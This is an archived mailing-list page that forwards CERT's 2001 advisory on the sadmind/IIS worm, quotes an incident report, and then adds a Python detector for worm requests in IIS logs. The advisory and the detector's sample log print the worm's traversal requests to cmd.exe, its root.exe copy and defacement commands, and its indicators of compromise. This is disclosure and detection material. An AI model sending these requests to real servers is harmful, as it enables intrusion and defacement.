you may want to check this out!

****************************************************

CERT Advisory CA-2001-11 sadmind/IIS Worm

   Original release date: May 08, 2001
   Last revised: --
   Source: CERT/CC

   A complete revision history is at the end of this file.

Systems Affected

     * Systems running unpatched versions of Microsoft IIS
     * Systems running unpatched versions of Solaris up to, and including,
       Solaris 7

Overview

   The CERT/CC has received reports of a new piece of self-propagating
   malicious code (referred to here as the sadmind/IIS worm). The worm
   uses two well-known vulnerabilities to compromise systems and deface
   web pages.

I. Description

   Based on preliminary analysis, the sadmind/IIS worm exploits a
   vulnerability in Solaris systems and subsequently installs software
   to attack Microsoft IIS web servers. In addition, it includes a
   component to propagate itself automatically to other vulnerable
   Solaris systems. It will add "+ +" to the .rhosts file in the root
   user's home directory. Finally, it will modify the index.html on the
   host Solaris system after compromising 2,000 IIS systems.

   To compromise the Solaris systems, the worm takes advantage of a
   two-year-old buffer overflow vulnerability in the Solstice sadmind
   program. For more information on this vulnerability, see

     http://www.kb.cert.org/vuls/id/28934
     http://www.cert.org/advisories/CA-1999-16.html

   After successfully compromising the Solaris systems, it uses a
   seven-month-old vulnerability to compromise the IIS systems. For
   additional information about this vulnerability, see

     http://www.kb.cert.org/vuls/id/111677

   Solaris systems that are successfully compromised via the worm
   exhibit the following characteristics:

     * Sample syslog entry from compromised Solaris system

May 7 02:40:01 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Bus Error - core dumped
May 7 02:40:01 carrier.domain.com last message repeated 1 time
May 7 02:40:03 carrier.domain.com last message repeated 1 time
May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
May 7 02:40:03 carrier.domain.com last message repeated 1 time
May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
May 7 02:40:08 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Hangup
May 7 02:40:08 carrier.domain.com last message repeated 1 time
May 7 02:44:14 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Killed

     * A rootshell listening on TCP port 600
     * Existence of the directories
          * /dev/cub contains logs of compromised machines
          * /dev/cuc contains tools that the worm uses to operate and
            propagate
     * Running processes of the scripts associated with the worm, such
       as the following:
          * /bin/sh /dev/cuc/sadmin.sh
          * /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111
          * /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 80
          * /bin/sh /dev/cuc/uniattack.sh
          * /bin/sh /dev/cuc/time.sh
          * /usr/sbin/inetd -s /tmp/.f
          * /bin/sleep 300

   Microsoft IIS servers that are successfully compromised exhibit the
   following characteristics:

     * Modified web pages that read as follows:

         fuck USA Government
         fuck PoizonBOx
         contact:sysadmcnat_private

     * Sample Log from Attacked IIS Server

2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \
GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \
GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \
GET /scripts/../../winnt/system32/cmd.exe \
/c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \
GET /scripts/root.exe /c+echo+\
<HTML code inserted here>.././index.asp 502 -

II. Impact

   Solaris systems compromised by this worm are being used to scan and
   compromise other Solaris and IIS systems. IIS systems compromised by
   this worm can suffer modified web content.

   Intruders can use the vulnerabilities exploited by this worm to
   execute arbitrary code with root privileges on vulnerable Solaris
   systems, and arbitrary commands with the privileges of the
   IUSR_machinename account on vulnerable Windows systems.

   We are receiving reports of other activity, including one report of
   files being destroyed on the compromised Windows machine, rendering
   them unbootable. It is unclear at this time if this activity is
   directly related to this worm.

III. Solutions

  Apply a patch from your vendor

   A patch is available from Microsoft at

     http://www.microsoft.com/technet/security/bulletin/MS00-078.asp

   For IIS Version 4:

     http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

   For IIS Version 5:

     http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp

   Additional advice on securing IIS web servers is available from

     http://www.microsoft.com/technet/security/iis5chk.asp
     http://www.microsoft.com/technet/security/tools.asp

   Apply a patch from Sun Microsystems as described in Sun Security
   Bulletin #00191:

     http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba

Appendix A. Vendor Information

  Microsoft Corporation

   The following documents regarding this vulnerability are available
   from Microsoft:

     http://www.microsoft.com/technet/security/bulletin/MS01-023.asp

  Sun Microsystems

   Sun has issued the following bulletin for this vulnerability:

     http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba

References

   1. Vulnerability Note VU#111677: Microsoft IIS 4.0 / 5.0 vulnerable to
      directory traversal via extended unicode in url (MS00-078)
      http://www.kb.cert.org/vuls/id/111677

   2. CERT Advisory CA-1999-16 Buffer Overflow in Sun Solstice AdminSuite
      Daemon sadmind
      http://www.cert.org/advisories/CA-1999-16.html

   Authors: Chad Dougherty, Shawn Hernan, Jeff Havrilla, Jeff Carpenter,
   Art Manion, Ian Finlay, John Shaffer

______________________________________________________________________

   This document is available from:
   http://www.cert.org/advisories/CA-2001-11.html

______________________________________________________________________

CERT/CC Contact Information

   Email: certat_private
   Phone: +1 412-268-7090 (24-hour hotline)
   Fax: +1 412-268-6989
   Postal address:
          CERT Coordination Center
          Software Engineering Institute
          Carnegie Mellon University
          Pittsburgh PA 15213-3890
          U.S.A.

   CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
   Monday through Friday; they are on call for emergencies during other
   hours, on U.S. holidays, and on weekends.

  Using encryption

   We strongly urge you to encrypt sensitive information sent by email.
   Our public PGP key is available from

     http://www.cert.org/CERT_PGP.key

   If you prefer to use DES, please call the CERT hotline for more
   information.

  Getting security information

   CERT publications and other security information are available from
   our web site

     http://www.cert.org/

   To subscribe to the CERT mailing list for advisories and bulletins,
   send email to majordomoat_private Please include in the body of your
   message

     subscribe cert-advisory

   * "CERT" and "CERT Coordination Center" are registered in the U.S.
   Patent and Trademark Office.

______________________________________________________________________

   NO WARRANTY
   Any material furnished by Carnegie Mellon University and the Software
   Engineering Institute is furnished on an "as is" basis. Carnegie
   Mellon University makes no warranties of any kind, either expressed or
   implied as to any matter including, but not limited to, warranty of
   fitness for a particular purpose or merchantability, exclusivity or
   results obtained from use of the material. Carnegie Mellon University
   does not make any warranty of any kind with respect to freedom from
   patent, trademark, or copyright infringement.
_________________________________________________________________

   Conditions for use, disclaimers, and sponsorship information

   Copyright 2001 Carnegie Mellon University.

   Revision History

   May 08, 2001: Initial Release

--------------------------------------------------------------------
Frank Quinonez                          Cisco Systems
Systems Engineer                        4 Venture St Suite 100
frankqat_private                        Irvine, CA 92618
Phone: 949-788-5162                     http://www.cisco.com
Pager: 800-365-4578
--------------------------------------------------------------------
Empowering the Internet Generation
Changing the way we Work, Live, Learn, and Play.

-----Original Message-----
From: Incidents Mailing List [mailto:INCIDENTSat_private] On Behalf Of Steve Halligan
Sent: Tuesday, May 08, 2001 7:24 AM
To: INCIDENTSat_private
Subject: 4 similar IIS attempts in a 48 hour period.

I got these 4 attempts from different sources in a rather small window of
time. They all start out with a portscan of port 80, so I don't think it
is the same person (why would they need to rescan each time?). You will
note that the order of the variation of the attempts is similar. Is this
a new worm? A new tool?
-Steve
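The IIS half of the worm leaves the request pattern shown in the advisory's sample log, and the MS00-078 vulnerability it relies on is a directory traversal hidden behind "extended unicode" (overlong UTF-8) encodings of the path separator. The following Python detector is an added example, not code from CERT or from either list post: it assumes the W3C field order of the advisory's sample, embeds a constructed log excerpt modelled on it, and canonicalises each request the lenient way the vulnerable server did so that `..%c0%af..` and its plain `../..` form are caught by the same rule.

```python
"""Flag sadmind/IIS worm request patterns in IIS W3C extended log lines.

Added example (not from the advisory or the list posts).  Field order
follows the advisory's sample log; the lenient UTF-8 decoder mimics the
behaviour behind MS00-078, where overlong encodings such as %c0%af were
accepted as '/' after the traversal check had already run.
"""
from urllib.parse import unquote_to_bytes

# Constructed sample, modelled on the advisory's IIS log excerpt.  Fields:
# date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status
SAMPLE_LOG = r"""
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/root.exe /c+echo+<HTML>.././index.asp 502 -
2001-05-06 12:21:05 10.10.10.11 - 10.20.20.20 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 -
2001-05-06 12:22:44 10.10.10.12 - 10.20.20.20 80 GET /index.asp - 200 -
"""


def lenient_utf8(data: bytes) -> str:
    """Decode UTF-8 while accepting overlong forms (C0 AF, E0 80 AF, F0 80 80 AF, ...).

    A strict decoder rejects these; a decoder that accepts them turns each of
    them into '/', which is what let '..%c0%af..' become '../..' on IIS.
    """
    out, i, n = [], 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
            continue
        # Sequence length and payload bits from the lead byte (2- to 6-byte forms).
        for length, mask, lead in ((2, 0x1F, 0xC0), (3, 0x0F, 0xE0), (4, 0x07, 0xF0),
                                   (5, 0x03, 0xF8), (6, 0x01, 0xFC)):
            if (b & ~mask & 0xFF) == lead:
                break
        else:  # stray continuation byte or 0xFE/0xFF
            out.append('\ufffd')
            i += 1
            continue
        tail = data[i + 1:i + length]
        if len(tail) != length - 1 or any(t & 0xC0 != 0x80 for t in tail):
            out.append('\ufffd')
            i += 1
            continue
        cp = b & mask
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        out.append(chr(cp) if cp <= 0x10FFFF else '\ufffd')
        i += length
    return ''.join(out)


def canonical_path(raw: str) -> str:
    """Percent-decode, lenient-UTF-8-decode and unify separators, as the target would."""
    return lenient_utf8(unquote_to_bytes(raw)).replace('\\', '/')


def escapes_root(path: str) -> bool:
    """True if '..' segments climb above the directory the path starts in."""
    depth = 0
    for seg in path.split('/'):
        if seg == '..':
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ('', '.'):
            depth += 1
    return False


def classify_request(stem: str, query: str) -> list:
    """Tag one request with the worm behaviours described in the advisory."""
    path = canonical_path(stem).lower()
    tags = []
    if escapes_root(path):
        tags.append('traversal')
    if path.endswith('/cmd.exe'):
        tags.append('cmd.exe')
    if path.endswith('/root.exe'):          # the cmd.exe copy the worm drops into /scripts
        tags.append('root.exe')
    q = canonical_path(query.replace('+', ' ')).lower() if query != '-' else ''
    if 'root.exe' in q:
        tags.append('copy-shell')
    if 'echo' in q and 'index.asp' in q:    # the defacement step
        tags.append('defacement')
    return tags


def parse_w3c_line(line: str):
    """Split one W3C extended log line (advisory field order); None for comments/short lines."""
    if line.startswith('#'):
        return None
    parts = line.split()
    if len(parts) < 10:
        return None
    date, time, c_ip, _user, _s_ip, _s_port, method, stem, query, status = parts[:10]
    return {'time': f'{date} {time}', 'client': c_ip, 'method': method,
            'stem': stem, 'query': query, 'status': int(status)}


def scan_log(text: str) -> list:
    """Return (client, canonical stem, tags) for every line matching a worm pattern."""
    hits = []
    for line in text.splitlines():
        rec = parse_w3c_line(line)
        if rec is None:
            continue
        tags = classify_request(rec['stem'], rec['query'])
        if tags:
            hits.append((rec['client'], canonical_path(rec['stem']), tags))
    return hits


if __name__ == '__main__':
    for client, path, tags in scan_log(SAMPLE_LOG):
        print(f'{client:15} {path:45} {",".join(tags)}')
```

Because IIS writes the already-decoded stem to its W3C log, the same rule fires on the `/scripts/../../winnt/system32/cmd.exe` form in the advisory's sample and on the raw `%c0%af` form seen on the wire.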
This archive was generated by hypermail 2b30 : Fri May 11 2001 - 00:59:28 PDT